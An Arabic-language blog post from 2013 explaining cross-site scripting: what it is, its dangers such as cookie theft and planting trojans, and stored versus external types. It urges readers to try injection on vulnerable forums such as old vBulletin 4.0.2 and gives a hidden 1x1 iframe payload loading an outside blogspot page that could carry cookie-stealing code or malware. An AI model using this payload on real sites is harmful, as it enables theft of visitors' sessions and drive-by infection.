الأربعاء، 14 أغسطس، 2013

أنواع تغرات الـ Xss :


السلام عليكم ورحمة لله تعالى وبركات

ه. تدونتى لهاذا اليوم

هي اعادة لدرس سبق وان شرحناه

، هى ماهى تغرات الـ Xss . فهذا نوع التغرات بات يشكل خطر كبير ، فلقد تم كشف أن اكبر المواقع مصابة بهده التغرة ، كموقع البحت الشهير Bing و كذلك موقع Ebbudy الشهير .
مقدمة : 
عبارة Xss هى اختصار لكلمة " Cross Site Scripting " و سر فى اختصارها ( استبدال الـ C بـ X ) هو حتى نفرق بين Css و تستخدم مع لغة Html . و تكون نتية خطأ طباعة يكون غير مشفر. حيت تمكن هده التغرات من ادراج كودات Html و كودات Javascript
الخطورة : 
تعد تغرات الـ Xss من أخطر التغرات ، دلك لأنها تسمح للمهاجم بتنفيد هجمات كتيرة ، هدا الأخير يكون عبر ادراج كودات الـ Html و Javascript ومن هده الهجمات :
  1. سرقة كوكيز اي شخص يدخل للموقع المصاب.
  2. تلغيم الموقع بحقن كود html ، لثغرة بمتصح معين لتحميل الباتش بجهاز متصفحين السكريبت .
  3. اضافة اي كود جافا سكريبت الى الموقع .
  4. اضافة أي كود html بجميع انواعه الى الموقع .
    أعتقد أن خطورة التغرة اتضحت ، فكما تلاحضون أن المهاجر ( الهاكر) يمكن حقن باتش بالسكريبت ، ويخترق صاحب الموقع أو صاحب السكريبت كدلك صاحب السرفر أو الزوار . تخيل معى الأضرار و الضحايا التى سيجنيها المهاجم ادا كان الموقع أو المنتدى المصاب بهده التغرة مشهور. 
    أنواع تغرات الـ Xss :
    1. Xss داخلى
    2. Xss خارجى.


    Xss داخلى :

    كدلك بعض الناس يطلقون عليه اسم  Html injection. معنى هذا أن التغرة تمكننا من حقن كود Html داخل الموقع عن طريق الـ POST . و يمكن كتابة الكود Html فى المنتدى ادا كان مصاب : فى مكان الردود ، ثم اضغط زر اضافة ، واعمل تحديث لصفحة المنتدى ، و ستلاحط الفرق.

    فى هده الحالة نقول عنه حقن داخلى ، لأنه يتم عن طريق الـ POST الردود " نموذج اضافة رد " ، وبعد الكود داخلي محفوظ ويتنفذ للجميع ..

    جرب على  اي سكريبت مصاب بثغرة xss داخليه أغلبها منتديات vbulletin الاصدارات القديمة كاصدار Vbulletin 4.0.2
    احقنه بهذا الكود :
    <html>
    <iframe name="I1" src="http://www.samiwolsol.blogspot.com" marginwidth="1" marginheight="1" height="1" width="1" scrolling="no" border="0" frameborder="0">
    </iframe>
    </iframe></p>
    </html>
     بمجرد حقن هذا الكود داخل السكريبت ، سيتم ادراج صفحة samiwolsol داخل الموقع بشكل غير مرئي.
    و لنفرض ان صفحة samiwolsol.blogspot.com ، فيها كود سحب الكوكيز ، او ملغومة بباتش ، أو أي كود Html آخر خطر !! وعدا ذلك من الأكواد الخبيتة ، التى تستطيع البحت عنها فى قوقل ، وتحقنها بسهولة داخل السكريبت المصاب بتغرة الـ Xss .

    0 التعليقات:

    إرسال تعليق

    لا تنسى ان تشارك samir soltani بتعليقك
    او نشر الموظوع جزاك الله خيرا